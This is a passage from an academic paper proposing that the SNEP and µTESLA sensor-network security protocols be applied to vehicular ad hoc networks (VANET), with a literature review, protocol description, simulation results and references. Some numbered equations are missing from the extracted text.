intelligent algorithms to process and classify different sensor data readings, with these algorithms embedded in the
application layer.
Vehicle data communication is added network technology as a result of the revolution in vehicle technical and
communication specifications. Each moving vehicle is equipped with sensors, processing units and transmission
channels, with location and context aware properties [2]. Base Stations (BS) on roads form the gateways for these
networks. Vehicles enter the signal range of one BS, joining one VANET, then exit to another, allowing communication
between same zone vehicles and the BS. VANET deploys and integrates different technologies for simple, effective and
secure communication: Wi-Fi IEEE 802.11, WAVE IEEE 1609, WiMAX, IEEE 802.16, Bluetooth, IRA, and ZigBee.
The communication can be extended to rich media streaming communication between vehicles, infotainment and
telemetric. In the high mobility of VANET, mobile IPv6 is an enhanced version of Mobile IP; this enhancement allows
for message exchange in VANET to be performed even during fast, continuous location changes. VANET can take
advantage of all these communicating capabilities intelligently applying the right connection in the right spatial and
temporal properties. However, assuring security, as in all other new technologies, is still a challenge and VANET is not
an exception.
Vehicular Ad hoc Network (VANET) was derived from Mobile Ad hoc Network (MANET), which has a self-organizing
architecture, used to connect mobile devices via wireless link. In this infrastructure, there is no central authority,
which means both of the networks are self-organized and decentralized systems. Security approaches must not rely on
central services provided by fixed infrastructure as nodes in these networks are independently mobile. Due to the
absence of a central authority, the attacker can easily join the network and perform malicious activities. Various
231
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
trust-based security architectures were proposed to overcome this fault. This research proposes applying security
primitives of sensor networks on VANET protocols in order to maintain data communication in a secure manner in
the high mobility nature of VANET.
As part of IoT, achieving SITS requires intelligent technical inspection and classification of vehicles’ sensor data [3]
and [4], allowing for the exchange of messages, securing the sources, and applying an intelligent choice of
cryptography, forcing semantic security and achieving the principle of categorizing who needs to know which
information in real critical time and in a secure and urgent fashion. However, other non-critical messages still can be
transmitted using any of the widely complicated proposed protocols, so the intelligent classifying of messages is
essential in this process.
Intelligence gives VANET the best quality of service as it was introduced in [5], to smoothly manage traffic flows,
improving the traffic experience, and appropriately reduce the loss of life and risks on the roads. The deployment of
intelligent roadside gateways, which usually have high processing power, a large amount of memory and bandwidth,
allows for running specific classifying algorithms and visualization of information with video and audio support. This
will reduce the VANET processing and loads handling on the mobile bodies.
Applying the proposed layered architecture, figure 2, will require constructing a VANET structure with intelligent
layers for implementing a pool of classified services and functionality and flow of messages. This research proposes
security primitives to be part of the VANET layer structure and to be applied in the transmission of sensitive, classified
sensor data in a fast, secure manner.
3. LITERATURE REVIEW
Applying cryptography on VANET communications using symmetric keys is more efficient in computation and
transmission terms, however, it doesn’t protect from the repudiation of messages. Using digital signatures was
proposed to solve this problem, such as using Group Signatures (GS) in [6], where a table of signatures of all nodes are
being saved and maintained in each node to prevent repudiation of messages. In [7], the traditional Public Key
Cryptography (PKC) was proposed to achieve semantic security. In this work, the reliability of messages is totally
232
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
dependent on the number of nodes delivering the same information. Vehicles are frequently allowed to change their
identities. This approach can consume a large amount of storage and cause delays in the transmission of messages.
Using identity-based signature and batch verification was proposed in [8]. This security paradigm approach requires
updating the anonymous identity in a time-synchronized manner. However, almost all proposed works require
buffering of each node’s identical signature and continuously changing identity in the network and the overhead of
maintaining and transmission of keys between nodes. In this current work, symmetric mechanisms are proposed while
assuring integrity through the use of message counters, and time synchronized key disclosure which was originally
proposed for sensor networks in [9]. Raw et al. in [10] highlighted different security mechanisms for security routing
protocol and integrity, which can guide the researchers for more efficient integrity in VANET. Still, the computation
and transmission cost of applying these mechanisms is high. The Multi Channels Model is proposed by Shukla et al. in
[11] for securing VANET network functionality while assuring confidentiality. However, it cannot be forced on
industries infrastructure to be used in all vehicles types. Islam et al. in [12] used Public Key mechanism to assure
authentication, integrity, and non-repudiation security requirements in VANET. The methods used include updating
security certificates when a vehicle enters a new VANET zone decreasing authentication time and, by result,
decreasing the message delay time.
Ming-Chin et al. in [13], proposed privacy preservation authentication scheme (PPAS) for VANETs. PPAS is intended
to be lightweight and to solve many security issues, but can be applied to vehicle to base station’s message exchange
only, without considering the vehicle to vehicle communication security issues. In earlier research, Ming-Chin et al.
[14] realized the need for the security protocol for VANET to be practical in the high mobility environment nature of
VANET. They propose trust-extended authentication mechanism (TEAM) for VANET with lightweight cryptography,
and performed a simulation proving the efficiency of the proposed security methods. However, their work partly relies
on technical hardware modifications, which can be considered a restriction of their work.
There are many security methods proposed for VANET; a complete list of proposed VANET security and privacy
methods were well studied by Marvy B. et al. in [15] and summarized in table 1.
233
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
Most proposed security protocols and methods assure security but are impractical in VANET as each node should
buffer all other nodes’ private keys and certificates, which is difficult and can result in storage overloading, besides
transmission delay. To achieve the semantic security A. Perrig et al. in [9] proposed two secure protocols (SNEP and
TESLA) for securing messages in sensor networks, where SNEP guarantees confidentiality, authentication, integrity
and freshness. TESLA is used for authenticated broadcasting and strong freshness assurance. They recommended
their security protocols for a higher level of communications; current research is adopting their methods for sensors’
data transmission in VANET. We propose that sensor protocols can be applied on emergency messages when classified
urgent intelligently, by an algorithm that resides in base stations, choosing the right security protocol for the right
packet to assure secure fast delivery for urgent sensor readings messages. However, other entertainment messages and
streams can use different protocols to allow rich content communication. In this work, we focus on transmitting short
messages using well studied sensor security primitives proposed and proved efficient in [9].
VANET applies a modified version of IEEE 802.11p, which was developed by IEEE for vehicular networks. The
modifications were mostly done in the network layer, figure 2. There are many wireless technologies, like IEEE
802.11p, that are standard for Dedicated Short Range Communication, DSRC [16], including:
234
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
• 4G-Long Term Evolution (LTE) which have been proposed for reliable vehicular communications,
• Modified version named 802.11p was developed by IEEE for vehicular networks; for dynamic multimedia
support Wifi IEEE 802.11 and WiMAX IEEE 802.16 are used.
VANET allows communication between vehicles and roadside stations, according to its spatial temporal parameters.
This provides the direct flow of messages between vehicles with or without the side station gateways; Mobile IPv6
proxy based architecture supports these two scenarios. VANET is intended to connect vehicles with each other and
with fixed stations (mobile and stationary nodes) that provide a gateway to WAN. Vehicles equipped with GPS,
communication and processors are location aware as stated in [1] and get connected with each other and to fixed road
gateways locally, by periodically exchanging messages containing their identity, time, velocity, direction and empty
content. A list of active nodes is maintained in the ad hoc network, where inactive ones are deleted.
The previously explained layered architecture of vehicle nodes provides different capabilities and constraints as shown
below:
• VANET consists of vehicle nodes and a base station, which is the gateway to the wide area network,
• Nodes are moving routing forest while the BS is the root of the tree, meaning each VANET can be represented
with a tree data structure. VANETs are a forest (multiple trees),
• The periodic transmission of messages (beacons) constructs the routing topology where the addressing allows
the exchange of messages.
• Trust Requirements: Usually, VANETs are distributed in different zones, that is, vehicles can move
continuously passing untrusted zones. This can threaten the security of network communications. Keep in
mind the fact that wireless communication is an untrusted broadcast, and it is expected that adversaries will be
able to eavesdrop, replay and inject messages, hence, the proposed security protocol must force security on
each node including the BS. Adopting this strategy from [9], all vehicle nodes must trust the BS initially
through a key shared between both, then a sequence of keys are derived from the original one. Each node has a
local clock used for the broadcast protocol.
235
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
• Data Confidentiality: Vehicle nodes must exchange only encrypted messages using secured channels only.
• Data Authentication: Vehicle nodes must be authenticated before the information is adopted in the receiver
side. Data authentication is achieved through a symmetric key for Message Authentication Code (MAC)
calculation. Despite using MAC, any receiver who knows the key can send malicious messages with a fake
identity. Solving this problem requires an asymmetric mechanism generated from the symmetric one using the
contribution of [9], by constructing an asymmetric broadcast using delayed key disclosure and one-way
function.
• Data Integrity ensures that messages were not altered; in this work, integrity is already deployed by data
authentication policies.
To achieve the required security, two building blocks were adopted from [9], namely, the design and the
implementation of two secure protocols, SNEP and TESLA for securing messages, where SNEP guarantees
confidentiality, authentication, integrity and freshness. A secret key is shared between each node and the BS, then
between the sender and receiver nodes. The protocol is extended to establish trust between all new nodes in the
network. As we propose dividing the VANET in an area into group of sub-VANETs where each is connected with
individual base station gateway, TESLA is used for authenticated broadcasting and strong freshness assurance. Table 2
lists the notations and descriptions used in constructing the proposed security protocol.
Notation Description
A, B Communication nodes
NA The nonce, can be bit string, generated by A
M1| M2 Concatenation of message M1 and message M2
KAB Symmetric shared key between A and B
Km Secret master key between base station and node
CAB The cipher text of message M generated using KAB
Cipher text with block chaining
C(KAB, x)
It was proved in [9] that applying SNEP in sensor networks will assure confidentiality, authentication, integrity, and
freshness. The cryptography primitives were efficiently used in sensor network with restricted memory, processing
and energy.
236
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
We claim that these advantages by applying SNEP in VANET are possible and effective as the similar main restriction
in VANET is lowering the communication bandwidth and delay time between vehicles while moving fast, passing from
one VANET to another, as SNEP works simply by adding bytes to messages, providing semantic security while
ensuring an efficient communication protocol. The magic is the appended bit string to the encrypted chain of messages
with block chain DES algorithm, for example. For achieving two node authentication, MAC code is used.
The SNEP provides semantic security without transmission overhead by sharing counter between nodes. Node implicit
counter is incremented while messages are being exchanged, and doesn't need to be transmitted. The sequence of
messages will be differently encrypted according to each node implicit counter. To ensure freshness, a nonce can be
sent from requested node and the responder node will send back the nonce as part of the response message. The
cipher text is generated by applying the encryption key and the counter on the original message [9], as in (1):
Where D is the data encrypted using the encryption key Kenc, concatenated with the implicit counter (CTR) in the
sender. Message Authentication Code (MAC) to identify the sender to the receiver node is generated, the CBC-MAC
from [16] is used and concatenated with the cipher text as in (2):
All keys are derived from master key using one-way function as in equation (5).
The complete message sent from A to B is constructed from equations (1) and (2) as in [9] , including the two parts:
encrypted message along with MAC, as in (3):
• Low Communication requirements as the counter is incremented implicitly and does not need to be
transmitted while the vehicle is moving in the range of current VANET where the node belongs; this will
increase security while lowering the transmission time, which is critical in VANET topology and it is the core
goal for this research.
• Data authentication: whenever a message is received, the MAC must be verified true.
• Replay protection: The synchronized implicit counter in both sides will prevent replaying old messages.
• Right sequence of messages between nodes is ensured by each node implicit counter.
• Data freshness is achieved by nodes using nonce, which is generated and sent with requests, and the nonce is
sent back within the response message that is being embedded in the MAC computations in the response
message; a response message may contain shaking hands information, general or emergency ones, as in (4)
237
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
A → B : Na, Ra
B→A:
Node A sends a nonce to node B using random number generation, Node B responds with secure encrypted nonce
message, then B receives and verifies the MAC, recognizes the responder node and the contents.
Most literature proposals for authentication in VANET are using asymmetric digital signatures, which requires a long
time of communication (delay) for creating the signature, sending, receiving and verification overhead before starting
information message exchange. However, applying asymmetric mechanisms in VANET is impractical as the
communication time is critical where vehicles are passing quickly between different base stations. To overcome this
problem, TESLA protocol was proposed for providing broadcast while ensuring security in [17] and [9]. TESLA can be
applied in VANET as processing and energy are not limited, however, delay is critical and transmitting of messages
must be in real time. A modified version to reflect faster authentication and broadcasting in VANET can be even more
applicable. The TESLA protocol was redesigned as follows:
Modified TESLA (µTESLA) requires that BS and vehicles are loosely time synchronized, clock time for each must be
part of the key generation. Communication is initialized by sending (broadcasting) packet from the base station to all
nodes periodically, calculating the MAC, the nodes start communication with the BS receiving MAC on the message
combined with the secret key, the received node verifies that MAC key is known only by the BS according to the
synchronized time stamp, and so verifying that the original message was not altered and stored in the receiver buffer.
Soon, the BS will broadcast the key to all nodes, which can have the key verified and used for further authenticating
the stored messages. The BS and all nodes maintain a chain of MAC keys generated by one-way function according to
time schedule that depends on the passing time of vehicle in the VANET. For any node to communicate at any
particular time, the sender node picks the last key Ki and applies the one-way function in [9], to generate the other
keys (key chain), as in (5):
Ki=F(Ki+1) (5)
The advantage of the one-way key chain is that once the receiver has an authenticated key of the chain, subsequent
keys of the chain can be used and authenticated.
For each node to communicate, it needs to perform time synchronization to obtain the key from the BS, while leaving
one Sub VANET and connecting to the next one, as all VANETs apply the same protocol with different parameters and
key chains.
238
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
Figure 3 shows an example of µTESLA. Each key belongs to sequence of keys updated periodically with static real time
stamp authenticating messages. The same key chain is used in different sub VANETs, where each base station
represents sub VANET on specific cluster (zone), allowing the stream of messages to continue in that zone, as
messages are usually related to specific zone conditions. Later in time, a new key is used in the zone. At any particular
time, the previous key for previous messages can be calculated according to the current one broadcast by the BS , as
the key is timely synchronized between nodes. This is applicable as most messages are real time ones, however,
previous keys can also be derived for old messages.
In VANET, constraints on vehicle movements and the fast speed results in fast joining and disjoining different zones of
networks, where each zone is VANET with BS gateway, leads to challenges in feasibility, security and efficiency.
Successful network communication requires strong cryptography, despite these challenges in VANET topology.
VANET hardware includes many sensors, strong processing units. All nodes in VANET are equipped with sensors,
controllers, and processors. Information is generated and exchanged. Random number generation is easily produced
using a specific MAC function with a private key.
Figure 3. M1 and M2 are using K1 while later in time M9 and M10 will use the key K2
Choosing the right block cipher algorithm is critical. For example, using the AES algorithm as in reference [16] with
many patterns of bytes for lookup tables is too large to be processed in the short time of node connection to VANET
joining in fast speed. A good choice can be RC5 from [18] regarding its small code and high efficiency. It uses 32-bit
data rotation and can be optimized for VANET with some reductions of code without affecting efficiency.
The counter may not be included in all messages to keep the ciphertext light in size in the VANET environment, as
processing and transmission should be fast and in real time. Counter value is variable with time, which leads to
different ciphers for the same message in different time stamps. This ensures semantic security, which means repeated
messages will generate different ciphers. To minimize messages weight and delay, the counter is not included in the
messages transmission as it does exist implicitly in both sides of the sender and the receiver nodes. New joining nodes
can synchronize to use the same counter with BS using SNEP.
239
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
Key setup is initialized in between the first node in VANET and the BS with a secret master key, all subsequent chains
of keys are derived from the original one, as shown in figure 3, M1 encrypted with both (key and counter) then xored
with the current time function. This will give the advantage of continuous joining of a fast moving vehicle with all base
stations while it is moving, as they apply the same key setup strategy.
• Message authentication: the block cipher in the protocol will be reused, then CBC-MAC can be used, block
construction is shown in figure 4.
• For ensuring message integrity, message M is encrypted with key Kenc, MAC key Kmac as shown in (6):
{M}Kenc,MAC(Kmac,{M}Kenc) (6)
A MAC for each packet must be produced to handle the loosy nature of VANET communications; this MAC will
guarantee integrity and authentication at the same time.
Figure 4. Cryptography primitives applied with the counter and time mode
SNEP and µTESLA have been evaluated efficiently and used practically as stated in [9] for sensor networks, the
transmission of messages requires only 8 bytes for encryption and authentication. In VANET, where processing and
buffering is not restricted as in sensor networks, different key generation algorithms can be applied. In particular, the
semantic security in VANET can be efficiently achieved using simple techniques proposed for practical sensor
networks.
For deeper study reflecting the efficiency and the simplicity of the proposed security primitives, simulations were
conducted for location aware routing protocols, namely DSDV, GPSR, and BMFR.
Using the Destination-Sequenced Distance-Vector (DSDV) Routing Algorithm, the nodes periodically transmit their
routing tables to their neighbor nodes and any updates according to time synchronization or event-driven [19].
240
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
Greedy Perimeter Stateless Routing, GPSR, utilizes the relation between geographic position of the node and message
targeted nodes [20]. Neighbor node for forwarding message to destination node is called BMFR [21].
The parameters used in the NC2 Simulation were taken from [21]. Implementing our proposed protocol, the security
size requirements are 40 bytes for the RC5 module, 60 bytes for µTESLA and 20 bytes for the encryption Module. The
encrypted, small message size plays a basic rule in the transmission time, the storage usage in high traffic situations
and the delivery ratio, as shown in the simulation results.
Figure 5 shows that among all protocols, the proposed security buffer size is relatively very small, compared to the
buffers required for applying the three routing protocols and that’s logically true regarding the storage requirements
for simple primitive cryptography applied on the proposed one, initially used for sensor networks.
Delay of messages were due to the security mechanisms where tested in the simulation, compared to other routing
protocols, as in figure 6.
The delay in the simulation is in the time taken for the packet sent from one node to reach the receiver node, including
buffering, processing and transmitting. The delay of encrypted packets after applying the cryptography primitives was
very small and ignorable compared to the other protocols, as the buffering, processing, and transmitting of the
encrypted messages require low processing cycles and transmission time.
The proposed primitives were deployed for achieving this goal. Low delay is achieved by using stream cipher for
encryption, where the size of the encrypted message is almost the size of the plaintext. The MAC uses 8 bytes of every
30-byte message; however, the MAC also achieves integrity, that is, there is no need to use other message integrity
mechanisms (e.g. a 16-bit CRC). Thus, encrypting and signing messages imposes an overhead of 6 bytes per message
over an unencrypted message with integrity checking, or about 20 % of the overall size of packet [9].
241
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
The used algorithm RC5 in the proposed security protocol requires only 8 instructions per cycle, which leads to very
low processing and transmitting; encrypting a 30-byte packet requires less than 4 cycles. Applying the security
primitives proposed for sensor networks is adequate for the high mobility nature of VANET where the proposed
methods can sign and encrypt each message even with single security round. The disclosure of the key can be
dynamically set to time intervals related to the density and mobility of VANET nodes.
8. CONCLUSION
Exchanging messages in VANET in a secure manner is a critical issue and should be researched deeply by intelligently
classifying the different types of messages according to the safety or entertainment categories. Safety and emergency
messages produced by specific safety sensors reflecting emergency information must be secured and transmitted or
broadcast in a fast manner with no delay or loss. For these types of messages, sensor security cryptography primitives
are proposed in this article, namely SNEP for authentication and encryption while ensuring integrity and
confidentiality, µTESLA for secure authenticated broadcasting. Simulation and analysis for the adopted protocols
proved the efficiency of these primitives in securing messages with ignorable delay and minimum requirements of
buffering and processing. This study brings up the idea of constructing sensor networks in the core infrastructure of
VANET, putting in the research area of VANET the driverless vehicles’ automated communications through secure
sensor networks with intelligent capabilities.
242
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
REFERENCES:
1. Abdelhamid S., Hassanein H.S., Takahara G. Vehicle as a Mobile Sensor. ProcediaComput.Sci.
2014;34:286–295.doi: 10.1016/j.procs.2014.07.025. [CrossRef] [Google Scholar]
2. Alshaer, J.J. Mobile Object-Tracking Approach using a Combination of Fuzzy Logic and Neural
Networks. Glob. J. Comput. Sci. Technol. E Netw. Web Secur., 15, 13–19, 2015
6. Chen, L., Ng, S., and Wang, G., “Threshold Anonymous Announcement in VANETs,” in IEEE
Journal on Selected Areas in Communications, vol. 29, pp. 605-615, 2011
7. Kounga, G., Walter, T., and Lachmund, S., “Proving Reliability of Anonymous Information in
VANETs,” in IEEE Transactions on Vehicular Technology, vol. 58, no. 6, pp. 2977-2989, 2009.
8. Mahapatra, P., and Naveena, A., “Enhancing Identity Based Batch Verification Scheme for
Security and Privacy in VANET,” in IEEE 7th International Advance Computing Conference,
IACC, pp. 391-396, January 2017.
9. A. Perrig, R. Szewczyk, V. Wen, D. Culler, J.D. Tygar, SPINS: security protocols for sensor
networks, Proceedings of ACM MobiCom'01, Rome, Italy, 2001, pp. 189–199.
10. Raw, R. S., Kumar, M., and Singh, N., “Security challenges, issues and their solutions for
VANET,” in International Journal of Network Security & Its Applications, vol. 5, issue 5, pp.
95–105, 2013.
11. Shukla, N., Dinker, A. G., Srivastava, N., and Singh, A., “Security in vehicular ad hoc network
by using multiple operating channels,” in IEEE 3rd International Conference on Computing
for Sustainable Global Development, INDIACom, pp. 3064-3068, March 2016.
243
Towards Secure IoT: Securing Messages Dissemination in Intelligent Traffic Systems
REFERENCES:
12. Islam, N., “Certificate revocation in vehicular Ad Hoc networks: a novel approach,” in IEEE
International Conference on Networking Systems and Security, NSysS, pp. 1-5, January 2016
13. Ming-Chin Chuang and Chao-Lin Chen, “PPAS: A Privacy Preservation Authentication
Scheme for Vehicular Communication Networks,” International Journal of Innovations in
Engineering and Technology (IJIET), vol.12, no.3, pp. 45-51, Feb. 2019.
14. Ming-Chin Chuang and Jeng-Farn Lee, “TEAM: Trust-Extended Authentication Mechanism
for Vehicular Ad Hoc Networks,” IEEE Systems Journal, vol. 8, no. 3, pp. 749-758,
September 2014.
15. Marvy B. Mansour, Cherif Salama, Hoda K. Mohamed and Sherif A. Hammad, VANET
SECURITY AND PRIVACY – AN OVERVIEW, International Journal of Network Security &
Its Applications (IJNSA) Vol. 10, No.2, pp 13-34,201
16. U. S. National Institute of Standards and Technology (NIST). DES model of operation.
Federal Information Processing Standards Publication 81 (FIPS PUB 81).
17. Adrian Perrig, Ran Canetti, J.D. Tygar, and Dawn Song. Efficient authentication and signing
of multicast streams over lossy channels. In IEEE Symposium on Security and Privacy, May
2000.
18. R. L. Rivest. The RC5 encryption algorithm. Proc. 1st Workshop on Fast Software
Encryption, pages 86–96, 1995.
244